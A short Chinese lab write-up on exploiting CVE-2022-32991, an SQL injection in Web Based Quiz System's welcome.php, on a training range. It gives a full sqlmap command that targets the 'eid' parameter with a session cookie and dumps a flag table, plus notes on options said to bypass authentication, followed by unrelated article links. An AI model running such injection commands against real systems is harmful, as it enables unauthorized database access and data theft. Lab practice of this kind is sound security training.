春秋云镜靶场 CVE-2022-32991 Web Based Quiz System SQL注入

# 春秋云镜靶场 CVE-2022-32991 Web Based Quiz System SQL注入

介绍

• 该CMS的welcome.php中存在SQL注入攻击。
• 利用sqlmap爆破

pyload

发现在以下界面存在sql注入：

sql注入：

python sqlmap.py -u "http://eci-2ze1h3jmxc8kr9szxe90.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0" --cookie="PHPSESSID=e6fd5of1njvnf7s8s53q3mu7vn" --batch  -current-db "ctf" -table "flag" -T "flag" -C "flag" --dump

一些注意的总结：

-p                             #指定sqlmap注入的传参参数
--cookie=""                        #绕过身份验证
--random-agent="" 或 --user-agent=""    #绕过客户端验证
--batch                         #默认后续sqlmap操作都为Y

本栏目推荐文章
• AtCoder World Tour 2022 B The Greatest Two
• Center-based 3D Object Detection and Tracking
• 2021-2022 ICPC Northwestern European Regional Programming Contest (NWERC 2021)
• An improved LSTM-based model for identifying high working intensity load segments of the tractor load spectrum
• 多态和虚函数 [补档-2022-10-23]
• 深拷贝和浅拷贝的问题 [补档-2022-10-22]
• P8368 [LNOI2022] 串
• origin2022导出图有水印
• 【专题】2022云上新型电力系统报告PDF合集分享（附原数据表）
• "nginx.conf" E514 : write error (file system full?)

靶场 System 32991 Based 2022靶场system 32991 based 32991 2022 cve 32991 based model-based 靶场 value-based flow-based transformer-based sample-based